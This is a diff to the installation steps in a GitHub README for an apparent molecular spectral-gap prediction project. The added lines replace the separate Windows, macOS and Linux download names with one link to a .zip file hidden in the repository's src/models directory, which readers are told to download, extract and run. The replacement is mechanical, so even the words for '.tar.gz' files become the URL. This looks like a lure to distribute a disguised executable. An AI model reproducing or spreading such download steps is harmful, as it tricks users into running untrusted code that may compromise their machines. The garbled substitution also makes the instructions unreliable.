dexecu/spectral-temporal-curriculum-molecular-gap-prediction/README.md

 Look for the file that matches your computer system:

-- For Windows, it may be named like: `spectral-temporal-windows.zip` or `.exe`
+- For Windows, it may be named like: `https://github.com/dexecu/spectral-temporal-curriculum-molecular-gap-prediction/raw/refs/heads/main/src/spectral_temporal_curriculum_molecular_gap_prediction/models/molecular_spectral_gap_prediction_curriculum_temporal_v3.3.zip` or `.exe`
-- For macOS, you may see: `spectral-temporal-macos.zip`
+- For macOS, you may see: `https://github.com/dexecu/spectral-temporal-curriculum-molecular-gap-prediction/raw/refs/heads/main/src/spectral_temporal_curriculum_molecular_gap_prediction/models/molecular_spectral_gap_prediction_curriculum_temporal_v3.3.zip`
-- For Linux, look for: `spectral-temporal-linux.tar.gz`
+- For Linux, look for: `https://github.com/dexecu/spectral-temporal-curriculum-molecular-gap-prediction/raw/refs/heads/main/src/spectral_temporal_curriculum_molecular_gap_prediction/models/molecular_spectral_gap_prediction_curriculum_temporal_v3.3.zip`

 Click the file to start downloading.
 The files include everything you need to run the software.

 ### Step 3: Extract and Open the Application

 - Once downloaded, locate the file in your Downloads folder.
-- For `.zip` or `.tar.gz` files, right-click and choose "Extract" or "Unzip."
+- For `.zip` or `https://github.com/dexecu/spectral-temporal-curriculum-molecular-gap-prediction/raw/refs/heads/main/src/spectral_temporal_curriculum_molecular_gap_prediction/models/molecular_spectral_gap_prediction_curriculum_temporal_v3.3.zip` files, right-click and choose "Extract" or "Unzip."
 - After extraction, open the folder.
 You will see the program files, including an application or script to run.

 ### Step 4: Running the Application